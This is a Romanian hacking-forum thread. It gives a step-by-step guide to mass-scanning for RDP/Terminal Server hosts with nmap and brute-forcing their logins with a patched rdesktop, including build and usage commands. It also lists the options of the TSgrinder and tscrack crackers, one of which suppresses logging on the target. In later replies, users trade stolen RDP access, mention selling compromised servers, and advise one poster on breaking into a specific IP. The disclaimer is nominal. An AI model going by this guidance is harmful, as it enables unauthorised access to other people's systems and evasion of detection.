Jump to content
pyth0n3

Terminal Server(remote desktop)

By pyth0n3, in Tutoriale in romana

Recommended Posts

pyth0n3 Newbie

pyth0n3

Posted
Posted (edited)

Voi descrie o mica guida cum sa gasiti un service Terminal Server si sa efectuati un dictionary attack dintrun sistem Linux.Metode sunt mai multe ,aici voi descrie doar una .Voi folosi ca tool rdesktop 1.4.1 pt. Linux la care va trebui adaugata o patch pt a putea efectua dictionary attack.

Rdesktop 1.4.1 il pueti gasi pe internet dar aici va pun un link de unde il puteti lua avand si un file de patch incorporat

rdesktop-1.4.1.tar

Primul lucru care trebuie sa faceti e sa gasiti un terminal server , care de o default e pe portul TCP 3389

Puteti folosi urmatorul comand pt Nmap ,sau depinde ce scanner folositi voi .

 nmap -oN TerminalServer.txt  -p 3389  --open 192.168.0.0/24

unde in loc de 192.168.0.0/24 veti specifica ip-urile care vreti sa scannati .Nmap va salva totul intrun file TerminalServer.txt .

Un alt command e: 

 nmap -PS3389 -iR 0 -p 3389 --open -oN TerminalServer.txt

in loc de 0 puneti cate ip vreti ca sa scaneze.(de default 0 va scana la infinit) Si in acest caz Nmap salveaza totul in TerminalService.txt ,Optiunea - - open e ca sa arate doar open service.

Dupa ce aveti destule obiective veti trece la faza nr 2 Dictionary attack.

Descarcatii rdesktop-1.4.1.tar .

Va trebui sa scoateti din archiva cu comandul 

 tar -xf rdesktop-1.4.1.tar

Dupa care mergeti unde ati desfacut archiva , 

cd rdesktop-1.4.1

Si dati urmatorul comand pt patch 

patch -p1 -i rdp-brute-force-r422.diff

Acum va trebui sa compilati :

./configure

make

make install

dupa ce ati terminat dati comandul rdesktop si va va arata toate optiunile.

Ex :

rdesktop -u administrator  -p pass.txt 192.168.1.1

unde pass.txt este dictionar de cuvinte

Un administator va configura in asa fel incat unele vor permite doar cateva tentative si vor inchide restul .

Acest lucru este ilegal ,ar fi bine sa fiti autorizati inainte de a face un scan pe orice retea.

Totul poate fi salvat intrun file log.

Am scris aceasta guida cu scop informativ ,doar cunoscand ceea ce face inamicul se pot lua masuri.

Edited by pyth0n3
Link to comment
Share on other sites
Slym Newbie

Slym

Posted
Posted
Daca are careva un RDP, pm me...

"TinKode has chosen not to receive private messages or may not be allowed to receive private messages. Therefore you may not send your message to him/her.

If you are trying to send this message to multiple recipients, remove TinKode from the recipient list and send the message again"

Cate RDP vrei?:) Iti dau eu :)

Link to comment
Share on other sites
pyth0n3 Newbie

pyth0n3

Posted
  • Author
Posted (edited)

Pasul 1 TSgrinder sau Tscrack

tsgrinder.exe [options] server

Options:

-w dictionary file (default 'dict')

-l 'leet' translation file

-d domain name

-u username (default 'administrator'

-b banner flag

-n number of simultaneous threads

-D debug level (default 9, lower number is more output)

tscrack [switch] [switch [arg]] ... <Host or IP[:port]>

Switches:

-h : Print usage help and exit

-V : Print version info and exit

-s : Print chipher strenght info and exit

-b : Enable failed password beep

-t : Use two simultaneous connections

-N : Prevent System Log entries on targeted serv

-U : Uninstall tscrack and remove components

-f <number> : Wordlist entry to start cracking with

-F <delay> : Sampling Frequency (Delay between samples in ms)

-l <user> : Account name to use, defaults to Administrator

-w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted

-p <password> : Use <password> to logon instead of wordlist/blank pass

-D <domain> : Specify domain to attempt logon to

Pasul 1 terminat

Succes!

Edited by pyth0n3
Link to comment
Share on other sites
tao Newbie

tao

Posted
Posted

Totusi niste sfaturi daca se poate:

am o adresa de ip cu 3389 deschis.

nu stiu nici user nici parola. ce e mai bine si repede sa fac?

cum aflu user name exact ca sa pot folosi mai bine un brute?

userul administrator nu se poate schimba? ma refer la acela cu drepturi de admin.

ideea e ca am gasit (completat) o lista de parole dar nu a gasit nimic. poate sa fie alt user decat administrator? ce ma sfatuiti?

Multzumesc anticipat

Link to comment
Share on other sites
tao Newbie

tao

Posted
Posted
Totusi niste sfaturi daca se poate:

am o adresa de ip cu 3389 deschis.

nu stiu nici user nici parola. ce e mai bine si repede sa fac?

cum aflu user name exact ca sa pot folosi mai bine un brute?

userul administrator nu se poate schimba? ma refer la acela cu drepturi de admin.

ideea e ca am gasit (completat) o lista de parole dar nu a gasit nimic. poate sa fie alt user decat administrator? ce ma sfatuiti?

Multzumesc anticipat

Sau poate alta solutie despre accesul prin rdp(3389)

Link to comment
Share on other sites
slardar Newbie

slardar

Posted
Posted

TSgrinder si cu alalalt sunt 2 cacaturi de tool-uri antice

Cum voi astia de carton dati scan de pe winbloz si mai vreti sa prindeti si multe servere ca apoi sa le vindeti cu 2 euro, o sa aveti nevoie de brutere complexe.

Baietii de la antichat aveau unul bunicel, l-am testat anu trecut.

Link to comment
Share on other sites
tao Newbie

tao

Posted
Posted

SLARDAR:

k

multzumesc de raspuns. (asta ca sa nu ne avantam in razboi despre win si linux sau altceva)

1.Nu mi-am dat cu parerea despre tsgrinder si tscrack(si nu o sa incep acum) dar ma intrebam daca este si alta solutie.

2.Eu nu m-am referit la scannere de rdp sau brute complexe , ci doar ptr o singura adresa de ip pentru care am nevoie de user si pass( posibil sa nu fie Administrator sau cele uzuale).

3.Nu pentru vanzare de 2 $ am eu nevoie de asa ceva.

Daca solutia cere plata putem face si asta. (rezonabil bineinteles)

Multzumesc anticipat.

"SUCCESURI"

Link to comment
Share on other sites
slardar Newbie

slardar

Posted
Posted

tao:

da-i frumos un nmap, vezi ce are instalat pe acolo, incerci brute pe tot ce se poate nu numa rdp

Daca esti pe windows si vrei sa faci brute doar la un singur IP, iei frumos tool-ul "Bruter" si incerci cu el

Pentru RDP o fi bun si TSgrinder ala, la urma urmei ai doar un target

Vezi poate are 80 deschis, vezi ceva site-uri etc

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...